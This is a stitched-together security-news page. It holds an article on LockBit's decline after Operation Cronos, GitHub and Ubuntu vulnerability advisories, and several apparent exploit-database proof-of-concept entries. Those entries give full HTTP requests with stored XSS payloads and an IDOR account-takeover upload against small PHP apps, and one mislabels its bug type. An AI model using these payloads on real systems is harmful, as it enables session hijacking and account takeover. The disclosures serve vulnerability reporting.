Nearly three months after Operation Cronos, it's clear the gang is not bouncing back from the innovative law-enforcement action. RaaS operators are on notice, and businesses should pay attention.

Source: Jan Zwoliński via Alamy Stock Photo

Despite the LockBit ransomware-as-a-service (RaaS) gang claiming to be back after a high-profile takedown in mid-February, an analysis reveals significant, ongoing disruption to the group's activities — along with ripple effects throughout the cybercrime underground, with implications for business risk.

LockBit was responsible for 25% to 33% of all ransomware attacks in 2023, according to Trend Micro, easily making it the biggest financial threat actor group of the last year. Since it emerged in 2020, it has claimed thousands of victims and millions in ransom, including cynical hits on hospitals during the pandemic.

The Operation Cronos effort, involving multiple law enforcement agencies around the world, led to outages on LockBit-affiliated platforms, and a takeover of its leak site by the UK's National Crime Agency (NCA). Authorities then used the latter to make arrests, impose sanctions, seize cryptocurrency, and more activities related to the inner workings of the group. They also publicized the LockBit admin panel and exposed the names of affiliates working with the group.

Further, they noted that decryption keys would be made available, and revealed that LockBit, contrary to its promises to victims, never deleted victim data after payments were made.

In all it was a savvy show of force and access from the policing community, spooking others in the ecosystem in the immediate aftermath and leading to wariness when it comes to working with any re-emergent version of LockBit and its ringleader, who goes by the handle "LockBitSupp."

Researchers from Trend Micro noted that, two and a half months after Operation Cronos, there's precious little evidence that things are turning around for the group — despite LockBitSupp's claims that the group is clawing its way back into normal operations.

**A Different Kind of Cybercrime Takedown**

Operation Cronos was initially met with skepticism by researchers, who pointed out that other recent, high-profile takedowns of RaaS groups like Black Basta, Conti, Hive, and Royal (not to mention the infrastructure for initial access trojans like Emotet, Qakbot, and TrickBot), have resulted in only temporary setbacks for their operators.

However, the LockBit strike is different: The sheer amount of information that law enforcement was able to access and make public has permanently damaged the group's standing in Dark Web circles.

"While they often focus on taking out command and control infrastructure, this effort went further," Trend Micro researchers explained in an analysis released today. "It saw police manage to compromise LockBit's admin panel, expose affiliates, and access information and conversations between affiliates and victims. This cumulative effort has helped to tarnish the reputation of LockBit among affiliates and the cybercrime community in general, which will make it harder to come back from."

Indeed, the fallout from the cybercrime community was swift, Trend Micro observed. For one, LockBitSupp has been banned from two popular underground forums, XSS and Exploit, hampering the admin's ability to garner support and rebuild.

Shortly after, a user on X (formerly Twitter) called "Loxbit" meanwhile claimed in a public post to have been cheated by LockBitSupp, while another presumed affiliate called "michon" opened up a forum arbitration thread against LockBitSupp for nonpayment. One initial-access broker using the handle "dealfixer" advertised its wares but specifically mentioned that they did not want to work with anybody from LockBit. And another IAB, "n30n," opened a claim on the ramp\_v2 forum about loss of payment surrounding the disruption.

Perhaps worse, some forum commentators were extremely concerned by the sheer amount of information that police were able to compile, and some speculated that LockBitSupp may even have worked with law enforcement on the operation. LockBitSupp quickly announced that a vulnerability in PHP was to blame for the ability of law enforcement to infiltrate the gang's information; Dark Web denizens simply pointed out that the bug is months old and criticized LockBit's security practices and lack of protection for affiliates.

"The sentiments of the cybercrime community to LockBit's disruption ranged from satisfaction to speculation about the group's future, hinting at the significant impact of the incident on the RaaS industry," according to Trend Micro's analysis, released today.

**LockBit Disruption's Chilling Effect on the RaaS Industry**

Indeed, the disruption has sparked some self-reflection among other active RaaS groups: A Snatch RaaS operator pointed out on its Telegram channel that they were all at risk.

"Disrupting and undermining the business model seem to have had a far more cumulative effect than executing a technical takedown," according to Trend Micro. "Reputation and trust are key to attracting affiliates, and when these are lost, it's harder to get people to return. Operation Cronos succeeded in striking against one element of its business that was most important: its brand."

Jon Clay, Trend Micro's vice president of threat intelligence, tells Dark Reading that LockBit's defanging and the disruption's chilling effect on RaaS groups in general present an opportunity for business risk management.

"This can be a time for businesses to reassess their defense models as we may see a slowdown in attacks while these other groups assess their own operational security," he notes. "This is also a time to review a business incident response plan to make sure you have all aspects of a breach covered, including business operation continuity, cyber insurance, and the response — to pay or not pay."

**LockBit Signs of Life Are Greatly Exaggerated**

LockBitSupp is nonetheless attempting to bounce back, Trend Micro found — though with few positive results.

New Tor leak sites launched a week after the operation, and LockBitSupp said on ramp\_v2 forum that the gang is actively seeking out IABs with access to .gov, .edu, and .org domains, indicating a thirst for revenge. It wasn't long before scores of supposed victims started appearing on the leak site, starting with the FBI.

However, when the ransom payment deadline came and went, instead of sensitive FBI data appearing on the site, LockBitSupp posted a lengthy declaration that it would continue to operate. In addition, more than two-thirds of the victims consisted of reuploaded attacks that occurred prior to Operation Cronos. Of the others, the victims belonged to other groups, such as ALPHV. In all, Trend Micro's telemetry revealed just one small true LockBit activity cluster after Cronos, from an affiliate in southeast Asia that carried a low, $2,800 ransom demand.

Perhaps more concerningly, the group has also been developing a new version of ransomware — Lockbit-NG-Dev. Trend Micro found it to have a new .NET core, which allows it to be more platform-agnostic; it also removes self-propagating capabilities and the ability to print ransom notes via the user's printers.

"The code base is completely new in relation to the move to this new language, which means that new security patterns will likely be needed to detect it. It's still a functional and powerful piece of ransomware," researchers warned.

Still, these are anemic sign of life at best for LockBit, and Clay notes that its unclear where it or its affiliates may go next. In general, he warns, defenders will need to be prepared for shifts in ransomware gang tactics going forward as those participating in the ecosystem assess the state of play.

"RaaS groups are likely looking at their own weaknesses being caught by law enforcement," he explains. "They may review what types of businesses/organizations they target so as to not give much attention to their attacks. Affiliates may look at how they can rapidly shift from one group to another in case their main RaaS group gets taken down."

He adds, "shifting towards data exfiltration only versus ransomware deployments may increase as these don't disrupt a business, but can still allow profits. We could also see RaaS groups shift entirely towards other attack types, like business email compromise (BEC), which don't seem to cause as much disruption, but are still very lucrative for their bottom lines."

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

LockBit Ransomware Takedown Strikes Deep Into Brand's Viability

Early versions of `amphp/http-client` with HTTP/2 support (v4.0.0-rc10 to 4.0.0) will collect HTTP/2 `CONTINUATION` frames in an unbounded buffer and will not check the header size limit until it has received the `END_HEADERS` flag, resulting in an OOM crash. Later versions of `amphp/http-client` (v4.1.0-rc1 and up) depend on `amphp/http` for HTTP/2 processing and will therefore need an updated version of `amphp/http`, see [GHSA-qjfw-cvjf-f4fm](https://github.com/amphp/http/security/advisories/GHSA-qjfw-cvjf-f4fm).

## Acknowledgements

Thank you to [Bartek Nowotarski](https://nowotarski.info/) for reporting the vulnerability.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-w8gf-g2vq-j2f4

**amphp/http-client Denial of Service via HTTP/2 CONTINUATION Frames**

High severity GitHub Reviewed Published Apr 3, 2024 in amphp/http-client • Updated Apr 3, 2024

**Package**

composer amphp/http-client (Composer)

**Affected versions**

\>= 4.0.0-rc10, <= 4.0.0

**Patched versions**

4.1.0-rc1

Early versions of amphp/http-client with HTTP/2 support (v4.0.0-rc10 to 4.0.0) will collect HTTP/2 CONTINUATION frames in an unbounded buffer and will not check the header size limit until it has received the END_HEADERS flag, resulting in an OOM crash. Later versions of amphp/http-client (v4.1.0-rc1 and up) depend on amphp/http for HTTP/2 processing and will therefore need an updated version of amphp/http, see GHSA-qjfw-cvjf-f4fm.

**Acknowledgements**

Thank you to Bartek Nowotarski for reporting the vulnerability.

**References**

*   GHSA-w8gf-g2vq-j2f4
*   GHSA-qjfw-cvjf-f4fm

Published to the GitHub Advisory Database

Apr 3, 2024

GHSA-w8gf-g2vq-j2f4: amphp/http-client  Denial of Service via HTTP/2 CONTINUATION Frames

`amphp/http` will collect HTTP/2 `CONTINUATION` frames in an unbounded buffer and will not check the header size limit until it has received the `END_HEADERS` flag, resulting in an OOM crash. `amphp/http-client` and `amphp/http-server` are indirectly affected if they're used with an unpatched version of `amphp/http`. Early versions of `amphp/http-client` with HTTP/2 support (v4.0.0-rc10 to 4.0.0) are also directly affected.

## Acknowledgements

Thank you to [Bartek Nowotarski](https://nowotarski.info/) for reporting the vulnerability.

**AMPHP Denial of Service via HTTP/2 CONTINUATION Frames**

High severity GitHub Reviewed Published Apr 3, 2024 in amphp/http • Updated Apr 3, 2024

GHSA-qjfw-cvjf-f4fm: AMPHP Denial of Service via HTTP/2 CONTINUATION Frames

Server Side Request Forgery (SSRF) vulnerability in Gleez Cms 1.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via modules/gleez/classes/request.php.

**Gleez Cms Server Side Request Forgery (SSRF) vulnerability**

Critical severity GitHub Reviewed Published Apr 3, 2024 to the GitHub Advisory Database • Updated Apr 3, 2024

GHSA-7mxg-r76p-363g: Gleez Cms Server Side Request Forgery (SSRF) vulnerability

Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){  
    $v = $this->conn->real_escape_string($v);  
    if(in_array($k, $main_field)){  
        if(!empty($data)) $data .= ", ";  
        $data .= " `{$k}` = '{$v}' ";  
    }  
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"

8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"

staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"

asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"

staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.

# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3139

# Vulnerable code section:

if(!empty($_FILES['img']['tmp_name'])){  
    if(!is_dir(base_app."uploads/avatars"))  
        mkdir(base_app."uploads/avatars");  
    $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);  
    $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path  
    // Rest of the code  
}

# Vulnerability Description:

This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024  
Content-Length: 8393  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="id"

7  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="firstname"

testtt  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="middlename"

testMiddle   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="lastname"

te Last Name   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="username"

admin2  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="password"

qwe123  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="img"; filename="hack.png"  
Content-Type: image/png

PNG  
...

- Response:

HTTP/1.1 200 OK  
Date: Mon, 01 Apr 2024 10:19:19 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.2.0  
X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8

1

# Impact:

This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md  
https://vuldb.com/?id.258914  
https://www.cve.org/CVERecord?id=CVE-2024-3139

Computer Laboratory Management System 1.0 Insecure Direct Object Reference

Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://code-projects.org# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/# Version: v1.0# Tested on: Windows 10# CVE : CVE-2024-29412# Description: Stored Cross Site Scripting vulnerability inHospital Management System - v1.0 allows an attacker to execute arbitrarycode via a crafted payload to the 'patient_id','first_name','middle_initial' ,'last_name'" in /receptionist.php component.# POC:1. Go to the User Login page: "http://localhost/HospitalManagementSystem-gh-pages/2. Login with "r1" ID which is redirected to "http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"endpoint.3. In Patient information functionality add this payload"><script>alert('1')</script> ,in all parameter.4. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

Hospital Management System 1.0 Cross Site Scripting

Ubuntu Security Notice 6720-1 - Kentaro Kawane discovered that Cacti incorrectly handled user provided input sent through request parameters to the graph_view.php script. A remote authenticated attacker could use this issue to perform SQL injection attacks.

    ==========================================================================Ubuntu Security Notice USN-6720-1April 02, 2024cacti vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS (Available with Ubuntu Pro)Summary:Cacti could be made to crash if it received specially craftedinput.Software Description:- cacti: web interface for graphing of monitoring systemsDetails:Kentaro Kawane discovered that Cacti incorrectly handled user providedinput sent through request parameters to the graph_view.php script.A remote authenticated attacker could use this issue to performSQL injection attacks.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS (Available with Ubuntu Pro):   cacti                           1.2.19+ds1-2ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6720-1   CVE-2023-39361

Ubuntu Security Notice USN-6720-1

E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)# Google Dork: NA# Date: 28-03-2024# Exploit Author: Sandeep Vishwakarma# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html# Version: v1.0# Tested on: Windows 10# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -v1.0 allows an attacker to execute arbitrary code via a crafted payload tothe Firstname and lastname parameter in the profile component.# POC:1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile2. In fname & lname parameter add payolad"><script>alert("Hacked_by_Sandy")</script>3. click on submit.# Reference:https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

E-Insurance 1.0 Cross Site Scripting

Blood Bank version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)# Date: 2023-11-14# Exploit Author: Ersin Erenler# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip# Version: 1.0# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0# CVE : CVE-2023-46020-------------------------------------------------------------------------------# Description:The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.Vulnerable File: updateprofile.phpParameters: rename, remail, rphone, rcity# Proof of Concept:----------------------1. Intercept the POST request to updateprofile.php via Burp Suite2. Inject the payload to the vulnerable parameters3. Payload: "><svg/onload=alert(document.domain)>4. Example request for rname parameter:---POST /bloodbank/file/updateprofile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 103Origin: http://localhostConnection: closeReferer: http://localhost/bloodbank/rprofile.php?id=1Cookie: PHPSESSID=<some-cookie-value>Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update----5. Go to the profile page and trigger the XSSXSS Payload:"><svg/onload=alert(document.domain)>

Tag

#php